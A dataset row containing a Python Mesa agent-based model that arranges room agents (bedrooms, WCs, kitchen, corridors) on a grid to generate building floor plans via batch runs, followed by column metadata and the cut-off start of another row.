hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b462c60deb6bb1cfa4fc1453e95138ace46b034f
| 27,314
|
py
|
Python
|
batch_run.py
|
Trippasch/ABM_Building_Model
|
a99e9f8f97f8abc2e6b4652d215890cf612bbdf5
|
[
"MIT"
] | null | null | null |
batch_run.py
|
Trippasch/ABM_Building_Model
|
a99e9f8f97f8abc2e6b4652d215890cf612bbdf5
|
[
"MIT"
] | null | null | null |
batch_run.py
|
Trippasch/ABM_Building_Model
|
a99e9f8f97f8abc2e6b4652d215890cf612bbdf5
|
[
"MIT"
] | null | null | null |
from mesa import Agent, Model
from abm_project.attractor import Attractor
from mesa.time import *
from mesa.space import *
from mesa.datacollection import *
from mesa.batchrunner import *
import numpy as np
import pandas as pd
import itertools
import random
# Start of datacollector functions
def get_agent_type(model):
agent_type = [type(agent) for agent in model.agents]
return agent_type
def get_agent_pos(model):
agent_pos = [agent.pos for agent in model.agents]
return agent_pos
class BuildingModelBatch(Model):
"""
A model representing a building with some number of rooms(agents)
"""
description = ("A model representing a building with some number of different types of rooms (agents)"
+" being attracted to each other based on some set of complicated rules."
+"The result of the model is the best possible plan view of the building according to these rules.")
# id generator to track run number in batch run data
id_gen = itertools.count(1)
# grid height
grid_h = 20
# grid width
grid_w = 20
def __init__(
self,
width=20,
height=20,
sl1_rooms=1,
sl_rooms=2,
wc1_rooms=1,
wc_rooms=1,
liv_rooms=1,
entry_rooms=1,
kit_rooms=1,
off_rooms=1,
corr_rooms=1,
bath_rooms=1,
):
# Set parameters
self.sl1_rooms = sl1_rooms
self.sl_rooms = sl_rooms
self.wc1_rooms = wc1_rooms
self.wc_rooms = wc_rooms
self.liv_rooms = liv_rooms
self.entry_rooms = entry_rooms
self.kit_rooms = kit_rooms
self.off_rooms = off_rooms
self.corr_rooms = corr_rooms
self.bath_rooms = bath_rooms
self.width = width
self.height = height
self.torus = False
self.counter = 1
self.num_agents = (sl_rooms + wc_rooms
+ sl1_rooms + wc1_rooms
+ liv_rooms + entry_rooms
+ kit_rooms + off_rooms
+ corr_rooms + bath_rooms)
self.agents = []
self.current_id = 0
self.grid = SingleGrid(width, height, self.torus)
self.schedule = RandomActivation(self)
self.stable_pos = 0
self.stable_sl1 = 0
self.stable_sl = 0
self.stable_wc = 0
self.stable_wc1 = 0
self.stable_liv = 0
self.stable_entry = 0
self.stable_kit = 0
self.stable_corr = 0
self.stable_off = 0
self.stable_bath = 0
self.datacollector = DataCollector(
model_reporters={
# "Number of Rooms": lambda m: m.num_agents,
# "SL Rooms": lambda m: m.sl_rooms,
# "SL1 Rooms": lambda m: m.sl1_rooms,
# "WC Rooms": lambda m: m.wc_rooms,
# "WC1 Rooms": lambda m: m.wc1_rooms,
"agent_type": get_agent_type,
"agent_pos": get_agent_pos,
},
agent_reporters={
"agent_id": "unique_id",
"agent_pos": "pos",
},
)
self.make_agents()
self.running = True
self.reset = False
self.datacollector.collect(self)
def make_agents(self):
# Create Sleeping Rooms(1)
for i in range(self.sl1_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
sl1room = SL1RoomAgent(self.next_id(), pos, self, True, self.sl1_rooms)
self.agents.append(sl1room)
self.schedule.add(sl1room)
self.grid.place_agent(sl1room, pos)
else:
i -= 1
# Create Sleeping Rooms
for i in range(self.sl_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
slroom = SLRoomAgent(self.next_id(), pos, self, True, self.sl_rooms)
self.agents.append(slroom)
self.schedule.add(slroom)
self.grid.place_agent(slroom, pos)
else:
i -= 1
# Create WC Rooms
for i in range(self.wc_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
wcroom = WCRoomAgent(self.next_id(), pos, self, True, self.wc_rooms)
self.agents.append(wcroom)
self.schedule.add(wcroom)
self.grid.place_agent(wcroom, pos)
else:
i -= 1
# Create WC Rooms(1)
for i in range(self.wc1_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
wc1room = WC1RoomAgent(self.next_id(), pos, self, True, self.wc1_rooms)
self.agents.append(wc1room)
self.schedule.add(wc1room)
self.grid.place_agent(wc1room, pos)
else:
i -= 1
# Create Living Rooms
for i in range(self.liv_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
livroom = LivRoomAgent(self.next_id(), pos, self, True, self.liv_rooms)
self.agents.append(livroom)
self.schedule.add(livroom)
self.grid.place_agent(livroom, pos)
else:
i -= 1
# Create Entries
for i in range(self.entry_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
enroom = EntryRoomAgent(self.next_id(), pos, self, True, self.entry_rooms)
self.agents.append(enroom)
self.schedule.add(enroom)
self.grid.place_agent(enroom, pos)
else:
i -= 1
# Create Kitchens
for i in range(self.kit_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
kitroom = KitRoomAgent(self.next_id(), pos, self, True, self.kit_rooms)
self.agents.append(kitroom)
self.schedule.add(kitroom)
self.grid.place_agent(kitroom, pos)
else:
i -= 1
# Create Office Rooms
for i in range(self.off_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
offroom = OffRoomAgent(self.next_id(), pos, self, True, self.off_rooms)
self.agents.append(offroom)
self.schedule.add(offroom)
self.grid.place_agent(offroom, pos)
else:
i -= 1
# Create Corridors
for i in range(self.corr_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
corrroom = CorrRoomAgent(self.next_id(), pos, self, True, self.corr_rooms)
self.agents.append(corrroom)
self.schedule.add(corrroom)
self.grid.place_agent(corrroom, pos)
else:
i -= 1
# Create Baths
for i in range(self.bath_rooms):
# Add the agent to a random grid cell
x = self.random.randrange(self.grid.width)
y = self.random.randrange(self.grid.height)
pos = (x, y)
if self.grid.is_cell_empty(pos):
bathroom = BathRoomAgent(self.next_id(), pos, self, True, self.bath_rooms)
self.agents.append(bathroom)
self.schedule.add(bathroom)
self.grid.place_agent(bathroom, pos)
else:
i -= 1
def step(self):
"""
Run one step of the model. If All agents are stable, halt the model.
"""
# Reset counter of stable_pos agents
self.stable_pos = 0
self.stable_sl1 = 0
self.stable_sl = 0
self.stable_wc = 0
self.stable_wc1 = 0
self.stable_liv = 0
self.stable_entry = 0
self.stable_kit = 0
self.stable_corr = 0
self.stable_off = 0
self.stable_bath = 0
# tell all the agents in the model to run their step function
self.schedule.step()
# collect data
self.datacollector.collect(self)
print("--stable_pos : ", self.stable_pos)
if self.stable_pos == self.schedule.get_agent_count():
self.running = False
if self.schedule.steps / 1000 == self.counter:
print(self.schedule.steps)
self.reset = True
# def run_model(self):
# for i in range(self.run_time):
# self.step()
class SL1RoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore=True, sl1_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.sl1_rooms = sl1_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is WCRoomAgent:
self.model.stable_sl1 += 1
if type(i) is CorrRoomAgent:
self.model.stable_sl1 += 1
if self.model.stable_sl1 == 2:
self.model.stable_pos += self.sl1_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WCRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.sl1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.sl1_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
class SLRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore=True, sl_rooms=2):
super().__init__(unique_id, pos, model, moore=moore)
self.sl_rooms = sl_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is CorrRoomAgent:
self.model.stable_sl += 1
if self.model.stable_sl == 2:
self.model.stable_pos += self.sl_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.sl_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.sl_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
class WC1RoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, wc1_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.wc1_rooms = wc1_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is OffRoomAgent:
self.model.stable_wc1 += 1
if self.model.stable_wc1 == 1:
self.model.stable_pos += self.wc1_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.wc1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.wc1_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class WCRoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, wc_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.wc_rooms = wc_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is SL1RoomAgent:
self.model.stable_wc += 1
if self.model.stable_wc == 1:
self.model.stable_pos += self.wc_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.wc_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.wc_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class LivRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, liv_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.liv_rooms = liv_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is EntryRoomAgent:
self.model.stable_liv += 1
if type(i) is BathRoomAgent:
self.model.stable_liv += 1
if type(i) is OffRoomAgent:
self.model.stable_liv += 1
if type(i) is CorrRoomAgent:
self.model.stable_liv += 1
if type(i) is KitRoomAgent:
self.model.stable_liv += 1
if self.model.stable_liv == 5:
self.model.stable_pos += self.liv_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is EntryRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.liv_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.liv_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
class EntryRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, entry_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.entry_rooms = entry_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_entry += 1
if self.model.stable_entry == 1:
self.model.stable_pos += self.entry_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.entry_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.entry_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.east_pole()
if random.randint(1,2) == 2:
self.west_pole()
if random.randint(1,1) == 1:
self.south_pole()
class KitRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, kit_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.kit_rooms = kit_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_kit += 1
# if type(i) is CorrRoomAgent:
# self.model.stable_kit += 1
# if type(i) is BathRoomAgent:
# self.model.stable_kit += 1
if self.model.stable_kit == 1:
self.model.stable_pos += self.kit_rooms
else:
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is BathRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.kit_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.kit_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.west_pole()
class OffRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, off_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.off_rooms = off_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_off += 1
if type(i) is WC1RoomAgent:
self.model.stable_off += 1
# if type(i) is CorrRoomAgent:
# self.model.stable_off += 1
if self.model.stable_off == 2:
self.model.stable_pos += self.off_rooms
else:
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WC1RoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.off_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.off_rooms > 0:
if random.randint(1,4) == 4:
self.west_pole()
if random.randint(1,3) == 3:
self.south_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class CorrRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, corr_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.corr_rooms = corr_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is SL1RoomAgent:
self.model.stable_corr += 1
if type(i) is SLRoomAgent:
self.model.stable_corr += 1
if type(i) is LivRoomAgent:
self.model.stable_corr += 1
# if type(i) is KitRoomAgent:
# self.model.stable_corr += 1
# if type(i) is OffRoomAgent:
# self.model.stable_corr += 1
if self.model.stable_corr == 4:
self.model.stable_pos += self.corr_rooms
else:
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SLRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is SL1RoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.corr_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.corr_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
class BathRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
def __init__(self, unique_id, pos, model, moore = True, bath_rooms=1):
super().__init__(unique_id, pos, model, moore=moore)
self.bath_rooms = bath_rooms
self.pos = pos
self.unique_id = unique_id
self.x, self.y = pos
self.moore = moore
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
for i in neighbors:
if type(i) is LivRoomAgent:
self.model.stable_bath += 1
# if type(i) is KitRoomAgent:
# self.model.stable_bath += 1
if self.model.stable_bath == 1:
self.model.stable_pos += self.bath_rooms
else:
if random.randint(1, 5) == 5:
for agent in self.model.agents:
if type(agent) is KitRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is LivRoomAgent:
self.agent_attraction(agent)
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
if self.bath_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
if self.bath_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# parameter lists for each parameter to be tested in batch run
br_params = {
"sl1_rooms": [1],
"sl_rooms": [2],
"wc1_rooms": [1],
"wc_rooms": [1],
"liv_rooms": [1],
"entry_rooms": [1],
"kit_rooms": [1],
"off_rooms": [1],
"corr_rooms": [1],
"bath_rooms": [1],
}
br = BatchRunner(
BuildingModelBatch,
br_params,
iterations=1,
max_steps=10000,
model_reporters={"Data Collector": lambda m: m.datacollector},
agent_reporters={"agent_pos": "pos"},
)
if __name__ == "__main__":
br.run_all()
br_df = br.get_model_vars_dataframe()
br_adf = br.get_agent_vars_dataframe()
br_step_data = pd.DataFrame()
for i in range(len(br_df["Data Collector"])):
if isinstance(br_df["Data Collector"][i], DataCollector):
i_run_data = br_df["Data Collector"][i].get_model_vars_dataframe()
br_step_data = br_step_data.append(i_run_data, ignore_index=True)
br_step_data.to_csv("BuildingModelBatch_Step_Data.csv")
# for i in range(len(br_adf["agent_pos"])):
# if isinstance(br_adf["agent_pos"][i], DataCollector):
# i_run_data = br_adf["agent_pos"][i].get_agent_vars_dataframe()
# br_step_data = br_step_data.append(i_run_data, ignore_index=True)
# br_step_data.to_csv("BuildingModelBatch_Step_Data.csv")
| 27.729949
| 107
| 0.668851
| 4,271
| 27,314
| 4.129478
| 0.048935
| 0.047174
| 0.08845
| 0.094347
| 0.81295
| 0.784487
| 0.743607
| 0.718773
| 0.714974
| 0.671883
| 0
| 0.027598
| 0.206707
| 27,314
| 985
| 108
| 27.729949
| 0.786367
| 0.115875
| 0
| 0.718539
| 0
| 0
| 0.021438
| 0.001335
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03383
| false
| 0
| 0.013532
| 0
| 0.083897
| 0.002706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b47631c6b3f7d6e7c9aa701c54a0051a55def4c3
| 33,547
|
py
|
Python
|
code/graph2tree/src/main.py
|
arkilpatel/SVAMP
|
6f09ab516ab06c18e948c0325236e84e80b5d4bd
|
